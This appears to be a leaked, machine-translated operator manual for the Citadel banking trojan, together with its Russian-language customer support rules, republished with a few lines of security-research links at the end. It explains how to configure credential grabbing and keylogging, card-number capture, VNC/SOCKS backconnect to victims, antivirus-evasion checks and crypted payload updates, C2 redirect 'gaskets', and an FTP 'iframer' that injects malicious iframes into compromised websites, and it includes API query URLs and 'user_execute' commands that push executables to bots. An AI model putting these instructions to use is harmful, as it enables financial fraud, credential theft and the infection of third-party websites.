If you specify a connection to some bot, it will execute this command one-time fee and you yyshlet data connection. If you ask avtokonnekt, the bot will initiate a connection to backconnect-server every time, as soon as he goes on the Internet. This option applies to both Backconnect Socks, and to the VNC.
Now we define a URL-masks, which we catch in our VNC admin.
Mask URL: URL is pointing to the scheme * mail.ru * or http:// *. Bank.com * (can be played as you like, to help you use the asterisk)
Parameters: Enter here the name POST-variables that are on the form of a site that we catch. On the example of mail.ru, it will be a Login * and Password *
The format parameter is simple, you can specify "login =", you can specify "login *", or simply "login". So choose as you like, do not forget to test the mask.
Parameters are not case sensitive.
Notify me of Jabber?: Put option if you want to make each new captured the ACC come to you. Jabber is defined in the settings, you can specify several, separated by commas.
IMPORTANT! To see the "Options" were written data Jabber-bot (Use only Jabber.org), from which all this will come to you.
Also, there is the possibility of creating Avtokonnekta with the bot, which came from the new account in the section. Ie in the gills immediately comes to you account for the konnekta + port on the VNC / SOCKS.
Do not forget that runs in front of the popup menu bots, links, etc. through the right mouse button: you can delete any unwanted acca (send to trash), mark it as your browser or enable / disable your settings.
Line two boats, six accounts, five live accounts (83%) calculates the% of live accounts on the basis if the bot did not show up in a network of more than 4 days, the account is dead.
Also, there is an API for rapid creation of VNC / SOCKS connections with the right boat, for example during the interception of a token or a message, you should immediately go to the ACC under the Holder, the injector you are a javascript / iframe call a URL to api.php
* VNCController
* Api.php / <token> / vnc / connect? BotIP = 1.2.3.4 & protocol = VNC
* Api.php / <token> / vnc / connect? BotIP = 1.2.3.4 & protocol = SOCKS
* Api.php / <token> / vnc / connect? BotId = WIN-ABC123 & protocol = VNC
* /
define ('API_TOKEN_KEY', 'changethispassword');
And pass the IP or BotID, the script tells the bot to establish the connection and the data come to you in zhabber. Timing depends on a parameter in the config timer_stats Builder.
Here's advice on dealing with bots on Win7/Vista: Use Firefox portable for Win7/Vista - it works correctly. Do not forget to disable the wallpaper does not drive much traffic. Also, to get into one of the directories - press the shortcut properties.
************************************************** ******************************
========================== >>>>> Installing chekinga web proxies
************************************************** ******************************
Section "SOCKS" in the admin panel - no need to configure anything.
************************************************** ******************************
========================== >>>>> Installing a log parser
************************************************** ******************************
With version 1.3.3.3 of the admin module is available under "links", there should be no difficulty.
************************************************** ******************************
Work with a >>>>> ========================== crypt-panel
************************************************** ******************************
There is a section "crypt exe" aka "crypt exe" and it shows in the main admin Citadel. If it's not there, then read below how to activate it.
It is needed in order for you to grant access to your kripteru and he periodically perezalivat exe file that bots update.
In this case, kripter does not have access to the rest of the admin, it is only available for this section.
To begin with, activate this section of at home, for this go to "Users", click on your username below and see a list of options available to us. Tick two points:
r_svc_crypter_crypt - This item gives privileges perezalivat exe file.
r_svc_crypter_pay - This item gives privileges to the table payments to perezalivkam.
Then create a new user and give him ONLY "r_svc_crypter_crypt" right, pass the login and password kripteru and it can form a perezalivat exe files in the folder files /
Do not forget to set chmod 777 on the folder and access to only trusted proxies.
Now, as soon as kripter perezalivat exe file, a new record in the table that the exe file is not paid, you will, in turn, checking everything is ok, mark in his admin that the crypts of X on a certain date paid.
You can enter data for the Jabber-notice verification scan4you in this section.
************************************************** ******************************
Installation ========================== >>>>> redirect (gasket for config)
************************************************** ******************************
Generation of gaskets (file.php) to protect the config (complete system redirects) BETA-version.
Generator pads solves the problem of transfer file.php on a single host, you can redirect juzat a-laying up to your main config file and the exe file.
Generation of gaskets provides a builder for this new button "Collect pad."
At the output we get 2 file, file.php, file_config.php (the name specified in the dialog box when you save is ignored (!)).
NOTE: file_config.php contains your encryption key in a modified form, it is taken out of your config, so the generation of gate configuration must be configured and valid,
Now load the files file_config, php, file.php on the pad and create a folder in the same files, which put the exe, config + video module files.
To prevent direct access to the files in the folder files are creating. Htaccess file as follows:
deny from all
In the setting of the config ask url_config1, url_loader up pads.
If you want to protect the gate and create a seal, I've found there are other / redir.php, open it and put this path to REAL gate
/ / URL of the original server.
$ Url = "http://localhost/s.php";
After that, save the sript under any name and set the bot in the config file path as the gate (url_server)
It is very important! To the host were allowed sockets in PHP, otherwise it will not work.
You can check this by creating a file with 1.php <? Php phpinfo ();?>
He must show Sockets Support enabled
Gaskets are not currently transmit video and screenshots, logs only. This is the only minus.!
************************************************** ******************************
Summary ========================== >>>>> manual for new ficham
************************************************** ******************************
1) In the admin there is a new section of "Efficiency and Security", we had integrated with the service scan4you, and now you can one-click check all of your executables builds at once in the admin palevnost Citadel, well, you can set up automatic scanning of files once a day and if one of your files over palitsya 3rd antivirus software, you will immediately receive a notification in your Jabber, so you can
immediately replace the exe file. Now, the mechanism will work for you automatically, too lazy to health!
=> To get started click the Settings button: Enter there Scan4you Profile ID (IMENNO ID, NOT LOGIN!!), Scan4you API Token, Jabber for notifications. Get the data can be in your profile scan4you.net
Then go to Settings, and enters the data Jabber-bot (pre zaregatsya account for the bot), it is recommended juzat jabber.org
Everything is ready.
2) Some customers have complained that only 40% of bots to the new updated version of the exe, the rest can not upgrade for some unknown reason. Indeed, the bug was from the time of Zeus, we have investigated and corrected. Now, a new parameter in the config file: timer_autoupdate 8
In which set the time (in hours), how often to download exe file and restart the server (RC4 encryption_key key must match). 80% of the bots are now updated successfully, and the crypt perezalivat exe, survival increased by 45%, your bots will have the most fresh and clean build.
=> The path to the exe-file is taken from the section "url_loader", respectively, the more often you clean perezalivat exe, the exe-file cleaner are your boots at home. They download it and restart, renewing itself.
4) Video Format from bots changed to. Webm (HTML5), we have built online video player admin Citadel, now you can watch videos right in your brauezere (recommended Opera). Of the possibilities: Fast назад-вперед/фулл-скрин/поиск video BotID, IP-address, date.
But that was not enough and we went on, many of you use (it is time to use and develop all industries combined) AZ and personal admin for injector / akkov collection, etc. Would you like from your admin to watch over the bay, or how you inject on the boat? It's easy! We created the API-system, you can now send BotID or IP-address of the script, and the API will return to you ready to code HTML-embed all the videos on the bot and you can insert and watch at least a narod.ru, without going to the admin Citadel.
=> That's all you can see in the section on-line player, figure it out it's simple.
=> Manual for exporting video files to adminok AZ-based online player.
Queries like this:
/ Api.php / megakey / video / list.php? Botnet = COOL & botIP = 111.111.111.111
/ Api.php / megakey / video / list.php? Botnet = COOL & botId = 017_B4DF7611E03FF4C8
in response to issue php-arrays or JSON
Format of queries:
api.php / <security-token> / video / <action> [. <extension>]? <params>
<security-token> the-key that you specify in the script and he api.php need to log on the server.
<action> - team
<extension> - (optional) extension: the output format. If you omit the - see debug-output. Vozvozhnost values:. Dump,. Php,. Json,. Xml
<params> - function parameters of the controller (you can see in the code)
Examples of queries:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1
This parameter is optional botnet.
citadelhost.ru/folder/api.php/ahro4uNg/video/list? botnet = COOL & botId = SURAKSHYA-PC_775A658D6522DF69
And again, substituting the expansion - you can get the desired format:
adding the parameter & embed = 1 can be obtained directly insert HTML-code for all the videos, but I do not recommend: there may be many) out there for this is a separate function.
Example without reference to the name of a botnet:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1
5) Added a handy parser parser system commands (CMDList) in the control panel, you can now see the new format as a table, the results of the system commands such as: ipconfig, a list of PCs on a LAN, a list of processes, etc.
=> You will see a separate section "CMD parser."
6) Now when you install the build on the bot will automatically be sent to the one-time admin cleduschaya information: installed firewalls, antivirus software installed, installed programs.
You can look for a particular boat, and for the entire botnet. We have created a separate section, where you can see all the statistics in the form of visual graphics and calculations. Now you know whom to fight.
=> The "Installed Software" if you see a lot of charts in the "Unknown" mean on the boat should not be anti-virus or firewall. Also, pressing the search for reports on the boat, you'll see a new kind of report.
7) Ability to "Favorite logs", you can tag any interesting account (account) when searching for data in the admin and then easily find it unnecessarily, he will be allocated a different color in the "Selected Records"
=> New parameters in the configuration file.
enable_luhn10_get a
enable_luhn10_post a
GET LUHN10 - analyzes the data in the GET-requests and WinSocket / Wininet for maps and dumps, the algorithm en.wikipedia.org / wiki / Luhn_algorithm
POST LUHN10 - analyzes the data in the POST https:// requests.
To find the map, select the type of report: "LUHN10 request" in the "Database Search".
8) Work with API.php. Through the API, you can pull the ftp-akkunty your ifreymera.
* IFramerController:
* Api.php / <token> / iframer / ftpList
* Api.php / <token> / iframer / ftpList? State = all
* Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31
* Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31 & state = all
* Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31 & state = all & plaintext = 1
For other examples of work with the API, see the comments in the script api.php
************************************************** ******************************
How to update ========================== >>>>> admin bot and one during the next version of Citadel
************************************************** ******************************
Perezaleyte and rewrite all the scripts on the server and go to the folder / install /, clicking Update - wait until your table will be updated, it may take a long time.
If you have too clogged database, you will have the meaning set admin again in the new folder and transfer it to a team of bots user_execute http://www.host.com/newcitadel.exe
Note that the config format with each new version may vary, so in order to get everything working properly, set NEW (going with the version in the archive) to your configuration settings and perezaleyte it in the folder files, along with the exe-file and the video module ( MANDATORY). Pay attention to the emerging new option in the config file that we provide along with the Builder.
Then, in order to get your bots are updated to the new version, you can run user_execute http://www.temphost.com/newcitadel.exe
Make sure the exe is available from the web at this link.
Enjoy.
************************************************** ******************************
Description ========================== >>>>> additional options in the config builder
************************************************** ******************************
disable_cookies 1/0 - If there is one, cookies will not be sent to you in the admin panel.
disable_antivirus 1/0 - If set to 1, the module will be turned off MiniAV.
enable_luhn10_get 1 - Module CardSwipe, if one is, will intercept the card / dumps in the GET request.
enable_luhn10_post 1 - Module CardSwipe, if one is, will intercept the card / dumps in the POST request.
remove_certs 1 - If there is one, will not send certificates.
timer_autoupdate 8 - Time in hours, auto-update exe from the folder files /. In other words how many hours to download and run the exe each time.
disable_httpgrabber 1 - If set to 1, disables HTTP grabber reports in Google Chrome (only in it)
report_software 1 - If there is one, to send information about the firewall / antivirus / software in the admin panel.
Section entry "WebFilters"
To activate the screen shots, Macka insert "@ * paypal.com / *"
If you need screenshots of the full screen, then "@ @ * paypal.com / *"
To activate the video recording, "# * paypal.com / *"
entry "WebFakes" - VEBFEYKI do not work!
************************************************** ******************************
========================== >>>>> FTP-ifreymer. Characterization
************************************************** ******************************
A) The script ifreymera
Poured on the left site and used as a "pad": performs all the work. Click the "Download Script" and fill it to the left on some ftp host.
He manages a special crontask from your admin area.
Debugging features:
* Create a folder next to the script iframer / writable. There he can save the preview ifreyminga files.
* Create a script file next to 'iframer.php.log' (the script name with the extension +. Log): it is there automatically will write logs of action, found the folder ...
* Do not forget to put right if you want to 666.777 debugging to do.
You can download it on the page ifreymera in socket: [download].
Physically he is in the system / utils /. Here, he is not called directly, just kept :)
Sam ifreymer to work does not require any files and records of rights, he carefully uses the PHP-session to store dannyah.
B) Configuration
Allows you to specify:
* URL-ifreymera script to run.
* HTML-code to insert
* Mode of action. 'Off' off, 'inject' insert HTML-code, 'preview' preview without changing the files on the FTP: proifreymlennye save files in the folder 'iframed /' next to the script (if it exists and is writable)
* Method of injection: a clever (not to damage the PHP / JS / ASP) files, write to the end, rewriting
* Depth bypass folders (levels 1 to 50)
* Masks for files and folders.
File ifreymitsya only if the folder and file have come to one of the masks.
If the folder has coincided with a mask - the depth of crawl increases (in the case of deeply mortgaged public_html)
C) The principle of client-side
First, before each phase of the communication sockets with ifreymerom last self-test is whether all the vital functions to work on, predictably, there is a server .... If the selftest failed - no work will be performed.
A cronjob every 10 minutes, collects new ftp-accounts from the database and creates jobs. Repeated ftp-acca is not allowed.
These accounts are fast on the script ifreymer and added to the list of "tasks" regardless of whether it is currently running or not.
Another cronjob also runs every 10 minutes. It just runs the script ifreymer: if it still works - nothing happens, but if it was dead out there (eg, time limit) - restart will be made. Threshold restart 120sek
And finally, the last cronjob: every minute, he asked how he ifreymer are things: how many jobs done, but in the queue as ready. If you have accounts with whom he had already finished - they pulled out and saved. In these ifreymere acca removed to save memory.
To avoid possible errors entire two-stage data transfer: request, response, request a confirmation action.
If during the day on no account of the results - he goes again.
D) Principle of operation of the ifreymera
At the beginning of the script is a list of file extensions to ignore. They do not change even if approached one of the masks.
Ifreymer stores the data in the session: they are included in all hosting services, and there is no need to play with the rights or seek a folder writable :) Written by taking into account the possible work, even under PHP4 (it is necessary to check with the event).
Ifreymer know how to properly recycle and breathe on timelimit'u: no sensitive data is not lost, it can continue to place a stop.
When you break the connection ifreymer can reconnect the next time.
Phases of work:
A. An attempt to connect. If it fails three times in a row - ACC is marked as invalid.
If many akkov to which you can not connect - ifreymer can "hang" raking timeouts. This is normal: it tries :)
Two. An attempt to authenticate. If you can not - ACC invalid.
Three. Listing all the folders and files to a specified depth. The sample files and folders matching the mask specified in the admin. To circumvent the depth approached folders increases.
4. Phase ifreyminga. Note that in the mode of 'preview' files to the FTP does not change!
For each file is determined by its type (by extension) that defines a method ifreyminga. It supports: html, php, CSS, JS, asp (or equivalent extension)
To add code ifreyma special marker to avoid accidental re-ifreyminga file.
In the smart code is added to the top of the php-file, but he ifreym output at the end :)
In the append code appended to the file. Cleverly is determined not to break the syntax of the code. JS-files infected by the introduction of the code drawing a iframe.
* At all stages of the statistics are collected, the list of changed files.
Ifreymerom run two tasks:
* "Start" works off automatically every 10 minutes, he acrobystitis new accounts, and includes a long process of verification.
* "Fee" - at any moment, picks up that it is ready
E) Interface
Shows the status of ifreymera (in fact, the state of cron-tasks). You can manually pull the job to update the information.
Displays a list of accounts. For each: Status, Error, a list of pages (by clicking), statistics (by clicking).
Invalid accounts are deleted after one day: poviseli and disappeared.
*) The principle of work assignments and ifreymera on his fingers:
Setting the "start": every 10 minutes
Get some new akkov and append them to the end of the list of tasks.
Next ifreymer passes on the task list (subscription)
Take the 1st acc. Connect. It did not work during the 10s? Lay off, recheck.
Take the 2nd. Joined! Log in but failed. With that done, he invalid.
Take the third. Do not connect. Also recheck.
Take the 4th. Connected. Logged. Parse .. ifreymim .. completed, it is valid.
Set "collection":
it may at any time to connect and pull out the intermediate results) Here is the 2nd and 4th, if they could work out.
When the 1st and 3rd ACC a few words of disconnection - they will be marked as invalid.
Added the latest features:
- Mode "check only". Speaks for itself
- Option: reifreyming accounts after N days. Each account after N days will be processed again.
- Replacement of old ifreym new code. If the changed HTML-code - it does not add a stupid replace the old :)
- Option "acca ifreymit only yesterday." Day to give it to ignore arrange)
- Logging of errors ifreymera (!)
- Intelligent detection of folders (they are indistinguishable from files)
- Reset button. Thanks to protect against re-ifreyma accounts will not spoil it :) Zaignorennye acca stored (ie not too spoiled)
- Selective ignore accounts (not ifreymit for anything). Reported ignore accounts displayed per day and hide. If you make a reset - and they will remain hanging all day.
- Sort by: Recent Developments (found, shipped, processed) in chronological order from top
- The lever of a manual start (full manual mode). This is done by click on the instructions above, if ifreymer mode "off"
For example, clicking the first to receive new acca. Necessary zaignoril, click the second: they fly away for processing.
The third task - to collect the results - always fulfills itself :)
************************************************** ******************************
Keylogger processes ========================== >>>>>
************************************************** ******************************
To enable the keylogger in the config Builder prescribes a new section:
entry "Keylogger"
processes "calc.exe; * notepad *"
a time
end
* Notepad * find the right process on behalf of
calc.exe the exact name of the process
Here we enumerate the list of processes which we set the keylogger.
Recall that a keylogger is on by default for all browsers, so use the module, if you need to keep track of separate-made applications.
time of 1 indicates the time in minutes, how many minutes in a row, since the application started to record key.
Section need to register before section entry "CmdList" or after it.
To search for records in admin area, select the type of report: "Keylogger"
************************************************** ******************************
GeoIP ========================== >>>>> Filtering Protection botnet
************************************************** ******************************
To enable a module, go to "Options" in the admin, there is a point "Permitted country", put a check on and celebrate the right of the country.
All countries that are not marked you automatically fall into the ignore list, however, reports of them will still be written, but when you request a config file.php and sending requests to the gate, the bots will be issued a 404-level HTTP-server (you can check out a sniffer)
Budget option from the abuse. Recommended only for small VIP-compartmentalized botnets in order to transfer the securities to a particular botnet bots.
If you notice a strong load on the server, immediately turn off the setting.
************************************************** ******************************
========================== >>>>> Double-log Cleaner
************************************************** ******************************
To enable or disable the module, you must go to "Options" sub-functions - "Deduplication reports" enable and disable.
If you notice a heavy load on the server, immediately disconnect the module in the settings.
************************************************** ******************************
************************************************** ******************************
-------------------------------------------------------------------------------------------Как задавать вопросы.txt - Original (Pastebin)
-------------------------------------------------------------------------------------------
Тема вопроса: Как обращаться в support и правильно задавать вопросы и решать проблемы.
Итак, предположим у вас случилась какая-то проблема с админкой или ботом.
Что делать? Прежде всего, вам конечно же, кажется что это баг в продукте, вам выдали ошибочный билдер, вам залили неправильные скрипты и вообще мир настроен против вас! Давайте оставим эмоции на потом, и будем рассуждать решать все логическим путем. Ответим себе на несколько вопросов:
1) Что было сделано в последний раз, после чего перестало что-то работать?
2) При каких условиях это было сделано (тестирование прогрузкой ботов, на виртуальной машине, перенос старых ботов)
Правильно ли настроен сервер? Убедитесь что вы имеете последнюю версию скриптов + билдера.
Правильно ли выставлены у вас права на сервере? стоит ли везде chmod 777 на нужных файлах?
Вообще, рекомендуется для серверов использовать панель Direct Admin т.к она значительно упрощает работу с доменами.
Опять же, если вы не обладаете навыками администратирования серверов, не пытайтесь сделать из мухи слона. Наймите человека кто за доп.плату вам настроит сервер и установит при желании скрипты Citadel. За хорошую плату вам поставят защиту от DDoS'a и правильно-выставленные безопасные юзерские привелегии. Тех.поддержка не занимается администратированием ваших серверов и их настройкой, мы отвечаем только за скрипты Citadel. Проверяйте сначала проблему всегда на уровне сервера и клиента(настроек конфига) и общайтесь с админом, может быть отстук упал у вас из-за того, что сеть попала в блек-лист SpamHaus? Или админка не может установиться из-за того, что вы запустили апач под рутом? А может в конфиге неправильно выставлена маска урлов? Посмотрите еще раз в главный мануал.
Любого админа можно нанять через соответствующие форумы и доски фрилансеров типa free-lance.ru
Услуги админов стоят в районе 100-200$.
Не экономьте на грамотной настройке сервера - это ваша инфраструктура.
У вас не работает бот?
Проверьте соответствует ли RC4 ключ в админке и в боте.
Работает ли корректно ваш крипт? Работает ли версия без крипта ?
Не присылается видео отчет? Проверьте, не стоят ли ограничения в PHP/Apache на загрузку файлов.
Вылетает ошибка Mysql: too many connections ? Проверьте, корректно ли работает ваш MYSQL-сервис на сервере, может быть он криво настроен, либо ваш сервер перегружен.
Может быть вас DDoS'ят? Смотрите куда и на что идет нагрузка, на какие скрипты. Воспользуйтесь штатными утилитами.
Пытаетесь запустить на VmWare и у вас не работает бот? Проверьте вашу внимательность, случаем, не русская ли это версия образа винды?
Не работает VNC гейт? Смотрите, работает ли PHP вообще на Windows-сервере, и правильно ли он настроен VNC-коннектор.
Оцените субъективно вашу внимательность к деталям, уверенность в действиях и логические шаги и приступайте к тестированию. Не бойтесь экспериментировать, ничего не сломается. Что-то внедрили? Протестите сначала на себе и на малом количестве ботов, прежде чем внести в работу.
Сначала протестируйте, потом пишите в саппорт. Не надо писать "у меня не работает что-то..." пишите сразу условия: что вы делали, как вы делали, где вы делали, что произошло, что не произошло, что должно произойти. Как можно больше информации в 1 сообщении! Представьте, что вы даете показания и описываете ВСЕ МЕЛЬЧАЙШИЕ ДЕТАЛИ.
Например: "У меня не работает VNC, запускаю бота на вмваре - отстукивает в основную админку. Даю команду на выполнение соединения уже в VNC админке - дальше ничего не происходит, проверил работает ли вообще Windows-сервер: тут у меня возникли сомнения, т.к отображается содержимое php-файлов в браузере, что может быть?"
Помните: правильно сформулированный вопрос - половина правильного ответа.
Клиентов становится больше, а саппорт один, поэтому каждый должен соблюдать нижеприведенные условия!
Озвучу несколько важных правил, при обращении к саппорту:
1) Никогда не пишите "привет? как дела?", из этой же серии "ты тут?", эти вопросы всегда останутся без ответа. Пишите сразу ваш вопрос/предложение/баг ОДНИМ сообщением, прилагайте как можно больше информации: что делаете, как делаете, какой результат, что хотелось бы получить.
2) Пишите с того же Jabber'a, с которого делали заказ продукта, никаких саппортов, доверенных лиц и т.п мы не принимаем к общению, если вы их не указали заранее при покупке.
3) Пожалейте наши глаза, не пишите по возможности TRANSLITOM - скорость считывания информация и ее усваивание снижается в разы!
4) Не долбите вопросами "когда будет апдейт?", "когда уже выдашь?", "когда будет это?" - если вы что-то заказали или разместили заявку, значит мы непременно на нее ответим и выдадим вам что нужно, т.к все записано. У саппорта есть свои приоритеты на разные типы заявок, если мы что-то задерживаем, значит оно так надо, это может быть дополнительное тестирование, багфикс и т.п
5) Не стоит задавать откровенно глупые вопросы, на которые вы можете найти ответ потратив 5 минут поиска в гугле, либо спросив у коллег по цеху на форуме. Вопросы в стиле "как закачать файлы на сервер", "почему не работает домен", "как выставить права" и т.п остаются без внимания.
6) Чем больше вы даете информации по проблеме, тем качественнее и доступнее вы получите ответ.
7) На вопросы когда будет апдейт, когда выдадут покупку и т.п саппорт НЕ отвечает, если вы подали заявку на что-то, она будет обработана в ближайшее время и мы про нее не забыли. Подобными вопросами будете только действовать на нервы и мешать доработке.
Срок обработки, если вы хотите купить новый модуль от 3 до 48 часов. В связи с большим количеством разных заявок (смена железа, докупка модулей, покупка лицензии, перевязка партнеру...) все заявки на получение чего либо(например купленного модуля) будут обрабатываться от 3 часов до 48 часов.
Убедительная просьба не спрашивать и не задавать вопросы, когда что-то будет или появится, не писать каждые 5 минут "как там дела? когда уже выдашь покупку?" - этим вы никак не ускорите процесс выдачи, а только будете отвлекать от работы и саппорта и кодера. Все заявки собираются в течении 1-2 дней и комплекты отдаются разом в одно время всем, никаких "мне как можно скорее" быть теперь не может.
Спасибо за внимание.
-------------------------------------------------------------------------------------------
Как задавать вопросы.txt (How to ask questions) - Google Translate (Pastebin)
-------------------------------------------------------------------------------------------
Subject: How to contact the support and to ask questions and solve problems.
So, suppose you have a problem occurred with the admin panel, or a bot.
What should I do? First of all, you certainly seem that this is a bug in the product, you gave a wrong builder, you have filled in the wrong scripts and all the world is against you! Let us leave emotions for later, and we will resolve all logical reasoning through. Answer a few questions:
1) What has been done for the last time, then something is no longer working?
2) Under what conditions it was done (testing progruzki bots, you need a virtual machine, moving the old bots)
Properly configured server? Make sure you have the latest version of the script + Builder.
Are the exhibits you have rights on the server? whether all the necessary chmod 777 on files?
In general, it is recommended for servers using Direct Admin panel unnecessarily it is much easier to work with domains.
Again, if you do not have the skills administratirovaniya servers, do not try to make mountains out of molehills. Hire a person who is for extra charge you a set up a server, if desired scripts Citadel. For a fee you will put a good defense against DDoS'a and well-exposed safe yuzersky privileges. Technical support is not engaged in administratirovaniem your servers and their configuration, we answer only for the scripts Citadel. Check the first problem is always at the server and client (config settings) and keep in touch with the administrator, can you otstuk fell due to the fact that the network came in black-list SpamHaus? Or admin panel can not be established due to the fact that you are running apache as root? And maybe in the config correctly put the mask URLs? Look again at the main manual.
Any administrator can hire through the appropriate forums and message boards freelancers tipa free-lance.ru
Services admins are around $ 100-200.
Do not skimp on well tuned server - this is your infrastructure.
You are not running a bot?
Check whether the RC4 key in the admin panel and in the paper.
Does your well-crypt? Does the version without the crypt?
Do not send video reports? Check if there are any restrictions in the PHP / Apache to load the files.
Flying bug Mysql: too many connections? Check whether your MYSQL-running service on the server, it can be configured crooked, or your server is overloaded.
Maybe you DDoS'yat? See where and what is the load at which scripts. Take advantage of full-time utilities.
Trying to run on VmWare and you are not running a bot? Check your attention, the case is not whether the Russian version of this image of Windows?
VNC is not working the gate? See if it works at all PHP on Windows-based server, and whether it is configured VNC-connector.
Evaluate your subjective attention to detail, confidence in the actions and the logical steps and start testing. Do not be afraid to experiment, do not break. Something is implemented? Protest at first on himself and on a small number of bots before they make to the work.
First test, then write in a support. No need to write "I have something not working ..." write once conditions are met: what did you do as you did where you did, what happened, what happened, what should happen. How much information in a message! Imagine that you are giving evidence and describe all the fine details.
For example: "I do not work VNC, run the bot on vmvare - knock to the main admin. I give the command to execute VNC connections already in admin area - then nothing happens, check whether all Windows-Server: here I have a doubt, that displays the contents of a php-file in a browser that can be? "
Remember: correct our problem - half the correct answer.
Clients become more and a support one, so everyone should abide by the conditions stated below!
Announced a few important rules when referring to a support:
1) Never write "hello? How are you?" Of the same series, "are you?" These questions will always remain unanswered. Write once your question / suggestion / bug in one message to attach as much information: what you are doing, as do, what is the result that we would like to receive.
2) Write to the same Jabber'a, from where did the order of the product, no tech support, proxies, etc. We do not accept to communicate if you do not specify in advance the purchase.
3) Have pity on our eyes, do not write as possible TRANSLITOM - speed reading information and its assimilation is reduced at times!
4) Do not peck issues "when the update?", "When it betray?", "When will it?" - If you ordered something, or have placed a request, then we will certainly respond to it and issue you need, everything is written unnecessarily. In tech support have their own priorities for the different types of applications, if we do something to detain, then so be it, this may be additional testing, bug fixes, etc.
5) Do not ask stupid questions frankly, to which you can find the answer after spending five minutes of searching in google or asking colleagues to shop online. Questions in the style of "how to upload files to the server", "why does not work domain," "how to set the right", etc. are neglected.
6) The more you give information on the problem, the better and more available you will receive a response.
7) On the issues when the update, will be given when the purchase of a support, etc. is NOT responsible if you have applied for something, it will be processed as soon as possible and we have not forgotten about her. Such questions will only act on the nerves and interfere with refining.
Processing time, if you want to buy a new module from 3 to 48 hours. Due to the large number of different applications (change of iron, Buy-modules, the purchase of a license, bond partner ...) All applications for which either (for example, bought the module) will be processed from 3 hours to 48 hours.
Please do not ask and do not ask questions when something will or will not write every 5 minutes, "how are things? When it betray a purchase?" - That you can not speed up the process of issuing, and will only detract from the work and tech support, and an encoder. All applications are collected within 1-2 days and sets are given once at the same time for all, no "to me as soon as possible" may not be now.
Thank you for your attention.
-------------------------------------------------------------------------------------------
Some Security Related Reports :
Corporate Computer. Java 7 u5 (last version nice !) but.... also Java 6 u27 (<-- Updated to 33 you wouldn't be there) |
German owner of compromised website investigating |
Last reports of a Finish User who seems to have understood. |
More about Citadel ? take a look at https://www.botnets.fr/index.php/Citadel (you'll find related publications)